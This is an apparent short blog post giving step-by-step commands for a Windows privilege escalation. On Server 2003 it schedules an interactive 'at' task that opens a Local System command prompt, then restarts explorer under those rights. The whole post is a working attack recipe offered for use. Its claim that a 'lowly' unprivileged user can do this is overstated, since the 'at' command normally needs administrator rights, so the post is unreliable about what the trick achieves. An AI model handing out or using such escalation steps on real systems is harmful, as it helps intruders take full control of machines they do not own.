I have just uncovered a way to perform root priviledge escalation under Windows (tested using Server 2003 SP2)…so easy, with no addons or anything – all you need is a console.
- Open up a command prompt (cmd.exe)
- Type whoami. This should return your username – lowly peon user.
- In the command prompt, enter the following: at <current time + 1 min> /interactive “cmd.exe”
The point of this step is to set up a scheduled task to execute in one minute of the current time. This scheduled task will launch a command prompt under the credentials of Local System.
For example: at 11:05 /interactive “cmd.exe” will launch the cmd window at 11:05am.
- Type whoami into the new cmd window…..Voila!
Once escalated, you can use taskmgr to kill explorer and then re-run it from the new command prompt with the escalated priviledge.